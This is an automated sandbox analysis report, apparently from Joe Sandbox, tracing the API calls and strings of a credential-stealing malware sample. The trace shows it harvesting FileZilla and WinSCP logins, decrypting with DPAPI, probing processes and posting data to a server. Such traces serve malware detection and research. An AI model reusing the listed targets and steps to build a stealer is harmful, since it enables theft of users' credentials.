                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                        • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                        • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                        • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                        • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3801961486-0
                                                                                                        • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                        • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                        • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                        • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                        • String ID: steam.exe
                                                                                                        • API String ID: 1799959500-2826358650
                                                                                                        • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                        • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                        • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                        • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                        • String ID: /
                                                                                                        • API String ID: 507856799-4001269591
                                                                                                        • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                        • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                        • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                        • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 1799959500-0
                                                                                                        • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                        • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                        • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                        • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                        • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                        • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                        • String ID: DPAPI
                                                                                                        • API String ID: 2068576380-1690256801
                                                                                                        • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                        • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                        • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                        • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 907984538-0
                                                                                                        • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                        • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                        • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                        • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                        • wsprintfA.USER32 ref: 00410D7D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                        • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi

                                                                                                        Control-flow Graph

                                                                                                        • [Control-flow graph omitted; legend: Executed / Not Executed; first block 405482-405593]
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                          • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                          • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                          • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                        • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                        • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,e90840a846d017e7b095f7543cdf2d15,",build_id,00437814,------), ref: 00405C67
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                        • _memmove.LIBCMT ref: 00405CB4
                                                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                        • _memmove.LIBCMT ref: 00405CD6
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                        • _memmove.LIBCMT ref: 00405D05
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                        • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                        • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                        • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                        • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$block$build_id$e90840a846d017e7b095f7543cdf2d15$file_data

                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        • strtok_s.MSVCRT ref: 0040E77E
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                        • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                        • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,e90840a846d017e7b095f7543cdf2d15,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                        • _memmove.LIBCMT ref: 00406639
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                        • _memmove.LIBCMT ref: 00406662
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                        • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                        • String ID: "$"$"$------$------$------$------$build_id$e90840a846d017e7b095f7543cdf2d15$mode

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 0040E1B7
                                                                                                        • _memset.LIBCMT ref: 0040E1D7
                                                                                                        • _memset.LIBCMT ref: 0040E1E8
                                                                                                        • _memset.LIBCMT ref: 0040E1F9
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                        • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                        • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                        • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: _memset$Value$Open$Enum
                                                                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

                                                                                                        APIs
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                        • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                        • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                        • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                        • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                        • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                        • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                        • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                        • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                        • GetProcAddress.KERNEL32(75070000,004184C2), ref: 004188AA
                                                                                                        • GetProcAddress.KERNEL32(75FD0000,004184C2), ref: 004188C5
                                                                                                        • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                        • GetProcAddress.KERNEL32(75A50000,004184C2), ref: 004188F7
                                                                                                        • GetProcAddress.KERNEL32(74E50000,004184C2), ref: 00418912
